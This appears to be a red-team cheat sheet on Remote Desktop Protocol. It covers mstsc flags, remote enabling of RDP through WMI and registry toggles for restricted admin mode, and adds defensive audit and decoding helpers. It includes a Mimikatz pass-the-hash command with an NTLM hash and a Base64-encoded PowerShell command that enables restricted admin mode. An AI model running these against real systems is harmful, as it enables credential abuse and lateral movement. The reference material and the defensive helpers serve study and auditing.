# Remote Desktop Protocol (RDP)

## Overview

> RDP (Remote Desktop Protocol) is a network communications protocol developed by Microsoft, which allows users to connect to another computer from a remote location.

## Using mstsc

To connect to a session in full-screen mode, type:

```powershell
mstsc /v:computer1 /f
```

## Using /admin and /restrictedAdmin

{% hint style="info" %}
Connecting to a workstation with Remote Desktop will disconnect any existing session. The /admin flag allows us to connect to the *admin* session, which does not disconnect the current user if we perform the login with the same user.
{% endhint %}

Connects you to a session for administering the server.

```powershell
mstsc /v:computer1 /f /admin
```

{% hint style="info" %}
Connecting to a workstation with `/restrictedAdmin` won't send your credentials to the remote PC, which can protect you if you connect to a compromised device. Connections made from the remote PC might not be authenticated by other PCs, which can affect application functionality and compatibility. The **/admin** parameter is implied.

Microsoft introduced *restricted admin mode* so that system administrators can perform a *network login* with RDP: when we supply this argument, the current login session is used to authenticate the RDP session.
{% endhint %}

{% hint style="warning" %}
Restricted admin mode is disabled by default.

We can enable it through the `DisableRestrictedAdmin` registry value (a DWORD: `0` enables restricted admin mode, while `1` or a missing value leaves it disabled) under the following key:

```powershell
HKLM:\System\CurrentControlSet\Control\Lsa
```

{% endhint %}
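The following is an added example, not code from the original page, that reads the registry value described above on the local host and reports the effective restricted admin state. It assumes a Windows PowerShell session with permission to read `HKLM:\System\CurrentControlSet\Control\Lsa`; the function name is my own.

```powershell
# Added example (not from the original page): report whether restricted admin
# mode is enabled on the local host by reading the DisableRestrictedAdmin value.
function Get-RestrictedAdminState {
    param(
        [string]$Path = 'HKLM:\System\CurrentControlSet\Control\Lsa'
    )
    # Get-ItemProperty returns $null (error suppressed) when the value is absent
    $item = Get-ItemProperty -Path $Path -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue

    if ($null -eq $item) {
        $value   = $null
        $enabled = $false          # value absent: OS default, restricted admin disabled
    } else {
        $value   = [int]$item.DisableRestrictedAdmin
        $enabled = ($value -eq 0)  # only an explicit 0 enables the mode
    }

    [pscustomobject]@{
        ComputerName           = $env:COMPUTERNAME
        DisableRestrictedAdmin = $value
        RestrictedAdminEnabled = $enabled
    }
}

# Usage: run on a host you administer, e.g. as part of a baseline check
Get-RestrictedAdminState
```

Because an absent value and a value of `1` both mean "disabled", the function distinguishes the two in its output so that a baseline report can tell an untouched host from one where the value was explicitly set.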

## Command examples

### RDP management through WMI

#### Checking if RDP is allowed

{% hint style="info" %}
`AllowTSConnections` is `0` when RDP connections are disabled and `1` when they are enabled.
{% endhint %}

{% code overflow="wrap" %}

```powershell
# $creds is a PSCredential, e.g. created with Get-Credential
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01 -Credential $creds
$tsobj.AllowTSConnections
```

{% endcode %}

#### Enabling AllowTSConnections (RDP) through WMI

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
# Arguments: AllowTSConnections, ModifyFirewallException (1 also opens the RDP firewall rule)
$tsobj.SetAllowTSConnections(1,1)
```

{% endcode %}

#### Disabling AllowTSConnections (RDP) through WMI

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
$tsobj.SetAllowTSConnections(0,0)
```

{% endcode %}
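As an added example that is not part of the original page, the audit function below uses the same `Win32_TerminalServiceSetting` class as the commands above to report the RDP state of several hosts at once, and additionally reads `Win32_TSGeneralSetting` (a class in the same namespace that the page does not mention) to show whether Network Level Authentication is enforced. It assumes Windows PowerShell 5.1 (where `Get-WmiObject` exists), DCOM/WMI access to the target hosts, and that `$creds` is a `PSCredential`; the function name and host names are my own.

```powershell
# Added example (not from the original page): audit RDP state on one or more
# hosts through WMI. Assumes WMI/DCOM access and an optional PSCredential.
function Get-RdpState {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [System.Management.Automation.PSCredential]$Credential
    )
    foreach ($computer in $ComputerName) {
        $wmiArgs = @{
            Namespace    = 'Root\CimV2\TerminalServices'
            ComputerName = $computer
            ErrorAction  = 'Stop'
        }
        if ($Credential) { $wmiArgs.Credential = $Credential }
        try {
            # AllowTSConnections: 0 = RDP disabled, 1 = enabled
            $ts  = Get-WmiObject -Class Win32_TerminalServiceSetting @wmiArgs
            # UserAuthenticationRequired: 1 = Network Level Authentication enforced
            # SecurityLayer: 0 = RDP security layer, 1 = Negotiate, 2 = TLS
            $gen = Get-WmiObject -Class Win32_TSGeneralSetting -Filter "TerminalName='RDP-Tcp'" @wmiArgs
            [pscustomobject]@{
                ComputerName  = $computer
                RdpEnabled    = [bool]$ts.AllowTSConnections
                NlaRequired   = [bool]$gen.UserAuthenticationRequired
                SecurityLayer = [int]$gen.SecurityLayer
                Error         = $null
            }
        } catch {
            # Unreachable host or access denied: keep the row so the report is complete
            [pscustomobject]@{
                ComputerName  = $computer
                RdpEnabled    = $null
                NlaRequired   = $null
                SecurityLayer = $null
                Error         = $_.Exception.Message
            }
        }
    }
}

# Usage: list hosts that accept RDP without NLA (constructed host names)
Get-RdpState -ComputerName SERVER01, SERVER02 -Credential $creds |
    Where-Object { $_.RdpEnabled -and -not $_.NlaRequired }
```

Rows for hosts that could not be queried keep an `Error` field instead of being dropped, so a missing host in the output never reads as "RDP disabled".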

### Restricted admin

#### Using restricted admin to perform pass-the-hash

{% code overflow="wrap" %}

```powershell
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"
```

{% endcode %}

#### Disabling restricted admin through the registry

{% code overflow="wrap" %}

```powershell
# Removing the value restores the OS default (restricted admin disabled)
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin
```

{% endcode %}

#### Enabling restricted admin through the registry

{% code overflow="wrap" %}

```powershell
# Creates a DWORD value of 0 (type inferred from the integer); New-ItemProperty
# fails if the value already exists, so use -Force or Set-ItemProperty in that case
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
```

{% endcode %}

The same command, Base64 encoded (UTF-16LE) for `powershell -enc`:

{% code overflow="wrap" %}

```powershell
powershell -enc TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAeQBzAHQAZQBtAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEwAcwBhACAALQBOAGEAbQBlACAARABpAHMAYQBiAGwAZQBSAGUAcwB0AHIAaQBjAHQAZQBkAEEAZABtAGkAbgAgAC0AVgBhAGwAdQBlACAAMAA=
```

{% endcode %}
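As an added example that is not part of the original page, the two helpers below show how the `-enc` argument above is produced and how to turn such a blob back into readable text, which is the step a defender performs when an encoded command line shows up in process-creation logs. It assumes only Windows PowerShell; the function names are my own, and the blob passed to the decoder is the one printed above.

```powershell
# Added example (not from the original page): encode a command for
# `powershell -EncodedCommand` and decode an existing blob back to text.
# -enc expects Base64 of the UTF-16LE ("Unicode") bytes of the script text.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Round trip: encoding the unquoted form of the command above reproduces the blob on this page
$cmd = 'New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name DisableRestrictedAdmin -Value 0'
$enc = ConvertTo-EncodedCommand -Command $cmd
$enc -eq 'TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAeQBzAHQAZQBtAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEwAcwBhACAALQBOAGEAbQBlACAARABpAHMAYQBiAGwAZQBSAGUAcwB0AHIAaQBjAHQAZQBkAEEAZABtAGkAbgAgAC0AVgBhAGwAdQBlACAAMAA='

# Triage: decode a blob recovered from a log and flag it if it touches the Lsa key.
# $enc stands in for a value pulled from a process-creation event (constructed input).
$decoded = ConvertFrom-EncodedCommand -Base64 $enc
if ($decoded -match 'Control\\Lsa') {
    "Encoded command modifies LSA settings: $decoded"
}
```

The comparison in the round trip evaluates to `$true`, which is a quick way to confirm that a blob found in the wild is byte-for-byte the command you expect rather than a variant with extra arguments appended.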

## References

{% embed url="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc" %}

